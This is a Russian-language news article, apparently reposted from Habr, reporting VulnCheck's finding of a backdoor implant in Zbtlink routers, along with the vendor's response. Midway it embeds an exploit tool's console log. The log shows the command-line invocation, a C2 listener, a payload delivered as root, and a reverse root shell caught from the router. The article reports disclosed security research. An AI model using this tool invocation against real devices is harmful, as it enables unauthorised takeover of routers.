В роутерах Zbtlink нашли бэкдор с отправкой внутренних данных третьим лицам

от автора

Согласно отчёту компании кибербезопасности VulnCheck, маршрутизаторы, произведённые китайской компанией Zbtlink, поставляются со встроенным бэкдором. Он позволяет отправлять внутренние данные третьим лицам каждые 35 секунд.

VulnCheck изучила 20 моделей Zbtlink и обнаружила в прошивке каждой из них бэкдор, который автоматически взаимодействует с облачными серверами в Китае. По словам технического директора Джейкоба Бейнса, он может предоставить компании доступ к другим устройствам, подключённым к сети маршрутизатора.

./build/endlessdoors_linux-arm64 -e -rctlport 7000 -c2 SSLShellServer -lport 4444time=2026-07-20T17:39:46.362Z level=STATUS msg="Certificate not provided. Generating a TLS Certificate"time=2026-07-20T17:39:46.452Z level=STATUS msg="Starting TLS listener on 192.168.1.100:4444"time=2026-07-20T17:39:46.452Z level=STATUS msg="Starting target" index=0 host=192.168.1.1 port=80 ssl=false "ssl auto"=falsetime=2026-07-20T17:39:46.452Z level=STATUS msg="rctl C2 listening on 192.168.1.100:7000; waiting up to 30s for the implant to phone home"time=2026-07-20T17:39:48.361Z level=SUCCESS msg="Implant connected from 192.168.1.1:53028"time=2026-07-20T17:39:48.361Z level=SUCCESS msg="Registration: class=\"_25.0527_174431\" mac=f8:5e:3c:97:d2:58"time=2026-07-20T17:39:48.361Z level=STATUS msg="Delivering the payload as root through the implant's popen command channel"time=2026-07-20T17:39:48.362Z level=SUCCESS msg="Payload delivered as root; awaiting the C2 callback"time=2026-07-20T17:39:48.362Z level=SUCCESS msg="Exploit successfully completed" exploited=truetime=2026-07-20T17:39:48.367Z level=SUCCESS msg="Caught new shell from 192.168.1.1:53296"time=2026-07-20T17:39:48.367Z level=STATUS msg="Active shell from 192.168.1.1:53296"sh: can't access tty; job control turned offBusyBox v1.33.2 (2024-05-16 08:34:26 UTC) built-in shell (ash)/tmp # iduid=0(root) gid=0(root) groups=0(root)

«Когда вы подключаете свой маршрутизатор к сети, он пытается связаться с сервером в Китае, который затем может полностью контролировать этот маршрутизатор», — сказал Бейнс.

Ранее Федеральная комиссия по связи США уже ввела полный запрет на продажу новых маршрутизаторов иностранного производства, хотя с тех пор она предоставила исключения нескольким производителям, не являющимся китайскими. 

«Что отличает этот случай — и я никогда раньше такого не видел — это то, что это всего лишь имплант. Он просто подключается. Вам не нужно совершать ошибку, открывая его для доступа в интернет», — сказал Бейнс.

Маршрутизаторы Zbtlink продаются по всему миру под торговыми марками Zbtlink и Wiflyer, в том числе на таких платформах, как Amazon. По словам эксперта, они в основном используются в коммерческих, а не в домашних сетях. Он оценивает их количество в 100 тысяч по всему миру, но в отчёте написал, что «реальное число затронутых устройств может быть больше, чем те двадцать моделей, которые мы изучили».

Бейнс говорит, что китайские маршрутизаторы часто маркируются под чужими брендами, то есть переименовываются так, чтобы выглядеть как устройства из другой страны.

«Они выглядят так, будто произведены в Южной Корее или Германии, но на самом деле сделаны в Китае одной компанией. И они могут использовать эту прошивку. Мы просто этого не знаем», — сказал он.

Представитель компании Shenzhen Zhibotong Electronics, владеющей Zbtlink, сообщил изданию CNet, что имплант не используется для мониторинга трафика или управления маршрутизаторами.

«Эта функция предназначена исключительно для послепродажного обслуживания и не служит никаким другим целям. Она, как правило, сохраняется только на опытных образцах для помощи клиентам в отладке программного обеспечения и не будет включена в серийные поставки», — заявил Майкл Ся.

Он также сказал, что компания может «предоставить обновлённую прошивку для отключения этой функции удалённого обслуживания». 

Однако в отчёте VulnCheck отмечается, что каждая доступная для загрузки на веб‑сайте Zbtlink версия прошивки содержала этот имплант.

Ранее в нескольких версиях прошивок китайских роутеров Tenda тоже нашли бэкдор — недокументированный механизм аутентификации, который позволяет получить доступ к веб‑интерфейсу устройства в обход ввода пароля.

ссылка на оригинал статьи https://habr.com/ru/articles/1067712/